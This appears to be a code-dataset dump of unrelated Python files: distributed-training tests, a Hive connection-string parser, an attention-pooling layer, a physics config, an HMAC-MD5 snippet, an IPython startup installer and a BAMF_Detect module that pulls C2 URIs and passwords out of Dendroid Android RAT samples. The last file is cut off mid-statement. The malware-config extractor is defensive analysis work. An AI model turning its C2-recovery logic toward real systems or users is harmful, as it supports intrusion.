def test__native_dist_model_create_from_backend_bad_slurm_config():
import os
from datetime import timedelta
os.environ["SLURM_JOB_ID"] = "1"
with pytest.raises(RuntimeError, match=r"SLURM distributed configuration is missing"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
with pytest.raises(ValueError, match=r"Arguments rank and world_size should not be specified with SLURM"):
_NativeDistModel.create_from_backend(
backend="gloo", timeout=timedelta(seconds=10), rank=1, init_method="", world_size=1
)
os.environ["SLURM_PROCID"] = "0"
os.environ["SLURM_LOCALID"] = "0"
os.environ["SLURM_NTASKS"] = "1"
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
os.environ["RANK"] = "1"
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
model = _NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
del os.environ["RANK"]
def _assert_model(model, true_conf):
assert model.device() == torch.device(true_conf["device"])
assert model.get_local_rank() == true_conf["local_rank"]
assert model.get_rank() == true_conf["rank"]
assert model.get_world_size() == true_conf["world_size"]
assert model.get_node_rank() == true_conf["node_index"]
assert model.get_nnodes() == true_conf["nnodes"]
assert model.get_nproc_per_node() == true_conf["nproc_per_node"]
def _test__native_dist_model_create_from_backend_no_dist(backend, true_device):
from datetime import timedelta
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timedelta(seconds=20))
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
_assert_model(
model,
{
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
},
)
model.finalize()
def _test__native_dist_model_create_from_backend_dist(init_method, local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
os.environ["RANK"] = f"{rank}"
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout, init_method=init_method)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
if init_method is None:
assert model._init_method == "env://"
else:
assert model._init_method == init_method
model.finalize()
del os.environ["RANK"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
def _test__native_dist_model_create_from_backend_slurm(local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
del os.environ["WORLD_SIZE"]
del os.environ["LOCAL_RANK"]
os.environ["SLURM_JOB_ID"] = "15000"
os.environ["SLURM_PROCID"] = str(rank)
os.environ["SLURM_LOCALID"] = str(local_rank)
os.environ["SLURM_NTASKS"] = str(world_size)
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
os.environ["WORLD_SIZE"] = str(world_size)
os.environ["LOCAL_RANK"] = str(local_rank)
def _test__native_dist_model_create_from_context_no_local_rank():
if "LOCAL_RANK" in os.environ:
del os.environ["LOCAL_RANK"]
from ignite.distributed.comp_models.base import ComputationModel
if ComputationModel._ext_local_rank is not None:
ComputationModel._ext_local_rank = None
with pytest.warns(UserWarning, match=r"Local rank information for native distributed setting will be initialized"):
_NativeDistModel.create_from_context()
def _test__native_dist_model_create_from_context_env_local_rank(true_conf):
import os
remove_lrank = False
if "LOCAL_RANK" not in os.environ:
os.environ["LOCAL_RANK"] = str(true_conf["local_rank"])
remove_lrank = True
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
if remove_lrank:
del os.environ["LOCAL_RANK"]
def _test__native_dist_model_create_from_context_set_local_rank(true_conf):
from ignite.distributed.comp_models.base import ComputationModel
lrank = None
if "LOCAL_RANK" in os.environ:
lrank = os.environ["LOCAL_RANK"]
del os.environ["LOCAL_RANK"]
ComputationModel._ext_local_rank = true_conf["local_rank"]
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
ComputationModel._ext_local_rank = None
if lrank is not None:
os.environ["LOCAL_RANK"] = lrank
def _test__native_dist_model_create_from_context_no_dist(true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=1, rank=0)
dist.barrier()
_test__native_dist_model_create_from_context_no_local_rank()
true_conf = {
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
def _test__native_dist_model_create_from_context_dist(local_rank, rank, world_size, true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=world_size, rank=rank)
dist.barrier()
if torch.cuda.is_available():
torch.cuda.set_device(local_rank)
true_conf = {
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
def test__native_dist_model_create_no_dist_gloo(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("gloo", device)
_test__native_dist_model_create_from_context_no_dist("gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_no_dist_nccl(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("nccl", device)
_test__native_dist_model_create_from_context_no_dist("nccl", device)
@pytest.mark.distributed
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_gloo_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_gloo_1')}/shared"
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_dist(init_method, local_rank, local_rank, world_size, "gloo", device)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
def test__native_dist_model_create_dist_gloo_2(local_rank, world_size):
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "gloo", device)
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_nccl_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_nccl_1')}/shared"
_test__native_dist_model_create_from_backend_dist(
init_method, local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(
local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_dist_nccl_2(local_rank, world_size):
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}")
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Skip if less than 2 GPUs")
def test__native_dist_model_warning_index_less_localrank(local_rank, world_size):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group("nccl", "tcp://0.0.0.0:2222", world_size=world_size, rank=local_rank)
dist.barrier()
# We deliberately incorrectly set cuda device to 0
torch.cuda.set_device(0)
model = _NativeDistModel.create_from_context()
assert isinstance(model, _NativeDistModel), f"{type(model)} vs _NativeDistModel"
if local_rank == 1:
with pytest.warns(UserWarning, match=r"Current device index is less than current local rank."):
model.device()
dist.destroy_process_group()
def _test_dist_spawn_fn(local_rank, backend, world_size, device):
from ignite.distributed.utils import _model
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
assert isinstance(_model, _NativeDistModel), f"{type(_model)} vs _NativeDistModel"
assert _model.get_local_rank() == local_rank
assert _model.get_world_size() == world_size
assert _model.device().type == torch.device(device).type
def _test__native_dist_model_spawn(backend, num_workers_per_machine, device, init_method=None, **spawn_kwargs):
_NativeDistModel.spawn(
_test_dist_spawn_fn,
args=(backend, num_workers_per_machine, device),
kwargs_dict={},
backend=backend,
nproc_per_node=num_workers_per_machine,
init_method=init_method,
**spawn_kwargs,
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.parametrize("init_method", [None, "env://", "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_gloo(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
nproc = torch.cuda.device_count() if torch.cuda.is_available() else 4
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_spawn("gloo", num_workers_per_machine=nproc, device=device, init_method=init_method)
if device.type == "cpu":
_test__native_dist_model_spawn(
"gloo", num_workers_per_machine=nproc, device=device, start_method="fork", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_nccl(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
num_workers_per_machine = torch.cuda.device_count()
_test__native_dist_model_spawn(
"nccl", num_workers_per_machine=num_workers_per_machine, device="cuda", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_none(world_size):
with pytest.raises(ValueError, match=r"Arguments rank and world_size should be None"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_not_none(world_size, local_rank, get_fixed_dirname):
init_method = f"file://{get_fixed_dirname('native_dist_model_init_method_is_not_none')}/shared"
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size, init_method=init_method)
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", rank=local_rank, init_method=init_method)
@pytest.mark.parametrize(
"environ, expected",
[
# fmt: off
# usual SLURM env
(
{
"SLURM_PROCID": "1", "SLURM_LOCALID": "1", "SLURM_NTASKS": "2", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
},
[1, 1, 2, "c1", 17345]
),
# usual SLURM env mnode
(
{
"SLURM_PROCID": "5", "SLURM_LOCALID": "1", "SLURM_NTASKS": "8", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
},
[5, 1, 8, "c1", 17345]
),
# usual SLURM env 1 node, 1 task + torch.distributed.launch
(
{
"SLURM_PROCID": "0", "SLURM_LOCALID": "0", "SLURM_NTASKS": "1", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "127.0.0.1", "MASTER_PORT": "2233", "RANK": "2", "LOCAL_RANK": "2", "WORLD_SIZE": "8",
},
[2, 2, 8, "127.0.0.1", 2233]
),
# usual SLURM env + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "3", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "3", "WORLD_SIZE": "4",
},
[3, 3, 4, "c1", 12233]
),
# usual SLURM env mnode + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "1", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "1", "WORLD_SIZE": "4"
},
[3, 1, 4, "c1", 12233]
),
# fmt: on
],
)
def test__setup_ddp_vars_from_slurm_env(environ, expected):
ddp_keys = ["RANK", "LOCAL_RANK", "WORLD_SIZE", "MASTER_ADDR", "MASTER_PORT"]
ddp_vars = _setup_ddp_vars_from_slurm_env(environ)
for key, value in zip(ddp_keys, expected):
assert key in ddp_vars
assert ddp_vars[key] == value
def test__setup_ddp_vars_from_slurm_env_bad_configs():
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(RuntimeError, match=r"No hostname detected in SLURM_JOB_NODELIST by ignite"):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "[]",
"SLURM_JOB_ID": "12345",
}
_setup_ddp_vars_from_slurm_env(environ)
|
querybook/server/lib/query_executor/connection_string/hive.py | shivammmmm/querybook | 1,144 | 16034 | import re
from typing import Dict, Tuple, List, NamedTuple, Optional
from lib.utils.decorators import with_exception_retry
from .helpers.common import (
split_hostport,
get_parsed_variables,
merge_hostport,
random_choice,
)
from .helpers.zookeeper import get_hostname_and_port_from_zk
# TODO: make these configurable?
MAX_URI_FETCH_ATTEMPTS = 10
MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC = 5
class RawHiveConnectionConf(NamedTuple):
# Raw Connection Configuration that's from a string -> dict transformation
hosts: List[Tuple[str, Optional[int]]]
default_db: str
session_variables: Dict[str, str]
conf_list: Dict[str, str]
var_list: Dict[str, str]
class HiveConnectionConf(NamedTuple):
host: str
port: Optional[int]
default_db: str
configuration: Dict[str, str]
def _extract_connection_url(connection_string: str) -> RawHiveConnectionConf:
# Parser for Hive JDBC string
# Loosely based on https://cwiki.apache.org/confluence/display/Hive/HiveServer2+Clients#HiveServer2Clients-JDBC
match = re.search(
r"^(?:jdbc:)?hive2:\/\/([\w.-]+(?:\:\d+)?(?:,[\w.-]+(?:\:\d+)?)*)\/(\w*)((?:;[\w.-]+=[\w.-]+)*)(\?[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?(\#[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?$", # noqa: E501
connection_string,
)
hosts = match.group(1)
default_db = match.group(2) or "default"
session_variables = match.group(3) or ""
conf_list = match.group(4) or ""
var_list = match.group(5) or ""
parsed_hosts = []
for hostport in hosts.split(","):
parsed_hosts.append(split_hostport(hostport))
parsed_session_variables = get_parsed_variables(session_variables[1:])
parsed_conf_list = get_parsed_variables(conf_list[1:])
parsed_var_list = get_parsed_variables(var_list[1:])
return RawHiveConnectionConf(
hosts=parsed_hosts,
default_db=default_db,
session_variables=parsed_session_variables,
conf_list=parsed_conf_list,
var_list=parsed_var_list,
)
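# Illustrative sketch (an assumption, not part of the original module): feeding a
# ZooKeeper-discovery JDBC string through _extract_connection_url should yield
# roughly the following RawHiveConnectionConf:
#
#   _extract_connection_url(
#       "jdbc:hive2://zk1:2181,zk2:2181/default;serviceDiscoveryMode=zooKeeper;zooKeeperNamespace=hiveserver2"
#   )
#   # hosts=[("zk1", 2181), ("zk2", 2181)], default_db="default",
#   # session_variables={"serviceDiscoveryMode": "zooKeeper",
#   #                    "zooKeeperNamespace": "hiveserver2"},
#   # conf_list={}, var_list={}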
@with_exception_retry(
max_retry=MAX_URI_FETCH_ATTEMPTS,
get_retry_delay=lambda retry: min(MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC, retry),
)
def get_hive_host_port_from_zk(
connection_conf: RawHiveConnectionConf,
) -> Tuple[str, int]:
zk_quorum = ",".join(
map(lambda hostport: merge_hostport(hostport), connection_conf.hosts)
)
zk_namespace = connection_conf.session_variables.get("zooKeeperNamespace")
raw_server_uris = get_hostname_and_port_from_zk(zk_quorum, zk_namespace) or []
server_uri_dicts = filter(
lambda d: d is not None,
[_server_uri_to_dict(raw_server_uri) for raw_server_uri in raw_server_uris],
)
server_uris = list(map(lambda d: d["serverUri"], server_uri_dicts))
random_server_uri = random_choice(server_uris)
if not random_server_uri:
raise Exception("Failed to get hostname and port from Zookeeper")
return split_hostport(random_server_uri)
def _server_uri_to_dict(server_uri: str) -> Optional[Dict[str, str]]:
match = re.search(r"serverUri=(.*);version=(.*);sequence=(.*)", server_uri)
if match:
return {
"serverUri": match.group(1),
"version": match.group(2),
"sequence": match.group(3),
}
def get_hive_connection_conf(connection_string: str) -> HiveConnectionConf:
hostname = None
port = None
connection_conf = _extract_connection_url(connection_string)
# We use zookeeper to find host name
if connection_conf.session_variables.get("serviceDiscoveryMode") == "zooKeeper":
hostname, port = get_hive_host_port_from_zk(connection_conf)
else: # We just return a normal host
hostname, port = random_choice(connection_conf.hosts, default=(None, None))
return HiveConnectionConf(
host=hostname,
port=port,
default_db=connection_conf.default_db,
configuration=connection_conf.conf_list,
)
|
xmodaler/modeling/layers/attention_pooler.py | cclauss/xmodaler | 830 | 16057 | # Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import torch
import torch.nn as nn
__all__ = ["AttentionPooler"]
class AttentionPooler(nn.Module):
def __init__(
self,
*,
hidden_size: int,
output_size: int,
dropout: float,
use_bn: bool
):
super(AttentionPooler, self).__init__()
self.att = nn.Sequential(
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(p=dropout),
nn.Linear(hidden_size, 1)
)
self.embed = nn.Linear(hidden_size, output_size)
self.softmax = nn.Softmax(dim=-1)
self.bn = nn.BatchNorm1d(output_size) if use_bn else None
def forward(self, hidden_states, masks = None, **kwargs):
score = self.att(hidden_states).squeeze(-1)
if masks is not None:
score = score + masks.view(score.size(0), -1)
score = self.softmax(score)
output = score.unsqueeze(1).matmul(hidden_states).squeeze(1)
output = self.embed(output)
if self.bn is not None:
output = self.bn(output)
return output |
CalibTracker/SiStripCommon/python/theBigNtuple_cfi.py | ckamtsikis/cmssw | 852 | 16093 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from CalibTracker.SiStripCommon.ShallowEventDataProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowDigisProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowTrackClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowRechitClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowTracksProducer_cfi import *
from RecoVertex.BeamSpotProducer.BeamSpot_cff import *
from RecoTracker.TrackProducer.TrackRefitters_cff import *
bigNtupleTrackCollectionTag = cms.InputTag("bigNtupleTracksRefit")
bigNtupleClusterCollectionTag = cms.InputTag("siStripClusters")
bigNtupleTracksRefit = RecoTracker.TrackProducer.TrackRefitter_cfi.TrackRefitter.clone(src = "generalTracks")
bigNtupleEventRun = shallowEventRun.clone()
bigNtupleDigis = shallowDigis.clone()
bigNtupleClusters = shallowClusters.clone(Clusters=bigNtupleClusterCollectionTag)
bigNtupleRecHits = shallowRechitClusters.clone(Clusters=bigNtupleClusterCollectionTag)
bigNtupleTrackClusters = shallowTrackClusters.clone(Tracks = bigNtupleTrackCollectionTag,Clusters=bigNtupleClusterCollectionTag)
bigNtupleTracks = shallowTracks.clone(Tracks = bigNtupleTrackCollectionTag)
bigShallowTree = cms.EDAnalyzer("ShallowTree",
outputCommands = cms.untracked.vstring(
'drop *',
'keep *_bigNtupleEventRun_*_*',
'keep *_bigNtupleDigis_*_*',
'keep *_bigNtupleClusters_*_*' ,
        'keep *_bigNtupleRecHits_*_*',
'keep *_bigNtupleTracks_*_*',
'keep *_bigNtupleTrackClusters_*_*'
)
)
from Configuration.StandardSequences.RawToDigi_Data_cff import *
from Configuration.StandardSequences.Reconstruction_cff import *
theBigNtuple = cms.Sequence( ( siPixelRecHits+siStripMatchedRecHits +
offlineBeamSpot +
bigNtupleTracksRefit)
* (bigNtupleEventRun +
bigNtupleClusters +
bigNtupleRecHits +
bigNtupleTracks +
bigNtupleTrackClusters
)
)
theBigNtupleDigi = cms.Sequence( siStripDigis + bigNtupleDigis )
|
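A hedged sketch of how these sequences might be scheduled from a top-level configuration. The process name, input file, event count, and output file name are placeholders, not anything taken from the CMSSW repository.

# Hypothetical driver config; a real job also needs geometry, magnetic field,
# and conditions (GlobalTag) set up for the refitter and local reconstruction to run.
import FWCore.ParameterSet.Config as cms

process = cms.Process("BIGNTUPLE")
process.load("CalibTracker.SiStripCommon.theBigNtuple_cfi")
process.TFileService = cms.Service("TFileService", fileName=cms.string("bigNtuple.root"))
process.source = cms.Source("PoolSource", fileNames=cms.untracked.vstring("file:input_RECO.root"))
process.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(100))
process.p = cms.Path(process.theBigNtupleDigi * process.theBigNtuple * process.bigShallowTree)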
Chapter 07/hmac-md5.py | Prakshal2607/Effective-Python-Penetration-Testing | 346 | 16148 | import hmac
hmac_md5 = hmac.new('secret-key')
f = open('sample-file.txt', 'rb')
try:
while True:
block = f.read(1024)
if not block:
break
hmac_md5.update(block)
finally:
f.close()
digest = hmac_md5.hexdigest()
print digest |
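For reference, a rough Python 3 rendering of the same chunked computation; unlike the Python 2 original, hmac.new needs an explicit digestmod here. The key and file name are the book's placeholders.

# Python 3 sketch of the chunked HMAC-MD5 digest above.
import hashlib
import hmac

hmac_md5 = hmac.new(b'secret-key', digestmod=hashlib.md5)
with open('sample-file.txt', 'rb') as f:
    for block in iter(lambda: f.read(1024), b''):
        hmac_md5.update(block)
print(hmac_md5.hexdigest())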
tests/strict/it_mod_double_fun.py | Euromance/pycopy | 663 | 16166 | import mod
def foo():
return 1
try:
mod.foo = foo
except RuntimeError:
print("RuntimeError1")
print(mod.foo())
try:
mod.foo = 1
except RuntimeError:
print("RuntimeError2")
print(mod.foo)
try:
mod.foo = 2
except RuntimeError:
print("RuntimeError3")
print(mod.foo)
def __main__():
pass
|
src/pyforest/auto_import.py | tnwei/pyforest | 1,002 | 16170 | <gh_stars>1000+
from pathlib import Path
IPYTHON_STARTUP_FOLDER = Path.home() / ".ipython" / "profile_default" / "startup"
STARTUP_FILE = IPYTHON_STARTUP_FOLDER / "pyforest_autoimport.py"
def _create_or_reset_startup_file():
if STARTUP_FILE.exists():
STARTUP_FILE.unlink() # deletes the old file
# this is important if someone messed around with the file
        # if they call our method, they expect us to repair everything
# therefore, we delete the old file and write a new, valid version
STARTUP_FILE.touch() # create a new file
def _write_into_startup_file():
with STARTUP_FILE.open("w") as file:
file.write(
f"""
# HOW TO DEACTIVATE AUTO-IMPORT:
# if you don't want to auto-import pyforest, you have two options:
# 0) if you only want to disable the auto-import temporarily and activate it later,
#    you can comment out the import statement below (and uncomment it again later)
# 1) if you never want to auto-import pyforest again, you can delete this file
try:
    import pyforest  # comment this line out if you temporarily don't want to auto-import pyforest
pass
except:
pass
"""
)
def setup():
if not IPYTHON_STARTUP_FOLDER.exists():
print(
f"Error: Could not find the default IPython startup folder at {IPYTHON_STARTUP_FOLDER}"
)
return False
_create_or_reset_startup_file()
_write_into_startup_file()
print(
"Success: pyforest is now available in Jupyter Notebook, Jupyter Lab and IPython because it was added to the IPython auto import"
)
return True
|
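A minimal sketch of invoking the helper above from a plain Python session, assuming pyforest is installed and the default IPython profile exists.

# Hypothetical invocation of the auto-import setup.
from pyforest.auto_import import setup, STARTUP_FILE

if setup():                          # writes the startup script into the IPython profile
    print(STARTUP_FILE.read_text())  # inspect what was written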
tests/future_division_eval.py | mayl8822/onelinerizer | 1,062 | 16172 | <filename>tests/future_division_eval.py
from __future__ import division
print eval('1/2')
exec('print 1/2')
eval(compile('print 1/2', 'wat.py', 'exec'))
print eval(compile('1/2', 'wat.py', 'eval'))
print eval(compile('1/2', 'wat.py', 'eval', 0, 0))
print eval(compile('1/2', 'wat.py', 'eval', 0, ~0))
|
BAMF_Detect/modules/dendroid.py | bwall/bamfdetect | 152 | 16204 | from common import Modules, data_strings, load_yara_rules, AndroidParseModule, ModuleMetadata
from base64 import b64decode
from string import printable
class dendroid(AndroidParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="dendroid",
bot_name="Dendroid",
description="Android RAT",
authors=["<NAME> (@botnet_hunter)"],
version="1.0.0",
date="August 18, 2014",
references=[]
)
AndroidParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("dendroid.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
uri = None
password = None
        for s in data_strings(file_data, charset="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="):
try:
line = b64decode(s)
if len(line) == 0:
continue
valid = True
for c in line:
if c not in printable:
valid = False
if not valid:
continue
if line.lower().startswith("https://") or line.lower().startswith("http://"):
uri = line
continue
if uri is not None:
password = line
break
except TypeError:
continue
if uri is not None:
results["c2_uri"] = uri
if password is not None:
try:
password.decode("utf8")
results["password"] = password
except UnicodeDecodeError:
results["password"] = "h" + password.encode("hex")
return results
Modules.list.append(dendroid()) |
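A small sketch of exercising the extractor above directly on raw file bytes, bypassing the BAMF_Detect YARA plumbing; the APK path is a placeholder.

# Hypothetical direct use of the Dendroid config extractor.
if __name__ == "__main__":
    with open("sample.apk", "rb") as fh:    # placeholder path
        file_data = fh.read()
    info = dendroid().get_bot_information(file_data)
    print(info)                             # e.g. {'c2_uri': ..., 'password': ...}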
examples/tensorboard/nested.py | dwolfschlaeger/guildai | 694 | 16230 | <filename>examples/tensorboard/nested.py
import tensorboardX
with tensorboardX.SummaryWriter("foo") as w:
w.add_scalar("a", 1.0, 1)
w.add_scalar("a", 2.0, 2)
with tensorboardX.SummaryWriter("foo/bar") as w:
w.add_scalar("a", 3.0, 3)
w.add_scalar("a", 4.0, 4)
with tensorboardX.SummaryWriter("foo/bar/baz") as w:
